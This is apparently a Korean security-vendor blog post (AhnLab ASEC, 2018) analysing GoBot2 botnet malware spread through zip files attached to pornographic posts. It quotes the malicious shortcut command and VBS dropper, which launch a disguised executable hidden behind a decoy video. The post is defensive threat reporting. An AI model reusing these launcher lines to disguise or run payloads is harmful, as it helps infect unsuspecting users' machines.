본문 바로가기
악성코드 정보

음란물과 함께 유포되는 GoBot2 악성코드 주의

by AhnLab ASEC 분석팀 2018. 6. 21.

20186월 초부터 음란물과 함께 악성코드가 활발히 유포되고 있는 것을 확인했다.해당 악성코드는 음란 게시글을 이용해 사용자들에게 *.zip 파일을 다운받게 유도했고, 다운받은 zip을 풀어 실행할 경우 실제 음란 사진 또는 음란 동영상이 실행되어 사용자가 악성코드에 감염된 사실을 인지하지 못하게 한다.


[그림-1] 620일 자 업로드 된 음란 게시글


   [그림-1]과 같은 게시글에서 파일을 다운로드 후 압축을 풀면 [그림-2] 처럼 *.mp4를 실행하는 바로가기 파일(*.LNK) 하나만 보이지만 폴더 옵션에서 “숨김파일 표시”를 체크하면 [그림-3] 처럼 mp4, lnk, txt 세 가지 확장자를 가진 파일이 존재함을 알 수 있다.


[그림-2] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시안함


[그림-3] 6월20일 이전 유포된 악성코드 zip - 숨김파일 표시


사용자의 클릭을 유도하는 바로가기 파일의 명령어를 보면 사용자가 인지하지 못하게 실제 *.mp4 동영상 파일도 실행하고, cmd를 이용하여 *.txt를 실행한다참고로 XP의 경우 확장자가 *.txt이면 notepad가 실행되지만 Win7의 경우 파일 구조에 맞게 EXE가 실행된다.


[그림-4] 바로가기 파일 속성


 %windir%\system32\cmd.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c @start 국산순두부.mp4 & cmd /c @start 국산순두부.txt

[표-1] 바로가기 명령어


안랩에 수집된 악성코드의 파일명을 보면 자극적인 이름을 사용하고 확장자는 *.txt 를 사용하였다. 실제로 해당 파일들은 64bit 닷넷 악성코드로실행 시 정상 프로세스 명으로 위장한 파일 2개를 생성 및 실행한다실행 된 프로세스는 GoBOT2”이라는 Botnet 이다.


[그림-5] 안랩에 수집된 파일 중 일부


620일 기준으로는 바로가기 파일이 VBS파일을 실행시키고, VBS파일이 동영상 및 악성코드를 실행시키는 구조로 변화했다.



[그림-6] 6월 20일 수집된 zip 파일


%windir%\system32\cmd.exe hidden cmd /c @start 조건처음이야.vbs

[표-2] 6월 20일 수집된 바로가기 파일 명령어

Set WshShell = WScript.CreateObject("WScript.Shell")

return = WshShell.Run ("cmd /c @start 조건처음이야.mp4 & cmd /c @start 조건처음이야.txt" ,0 ,true)

[표-3] 6월 20일 수집된 VBS 코드


바로가기 파일에 의해 실행되는 악성코드는 2016년 이후 부터 랜섬웨어, 마이너류에 많이 사용되어왔. 그러므로 사용자는 늘 인터넷에서 파일을 다운로드 받을 경우 알 수 없는 글에 대해 주의하여야 한다.


현재 안랩 제품에서는 음란물과 함께 유포되는 악성코드를 다음과 같이 진단하고 있다.


- Trojan/Win64.Agent(2018.06.10.01)

- LNK/Runner (2018.06.11.01)

- LNK/Autorun.Gen (2018.06.15.00)




댓글0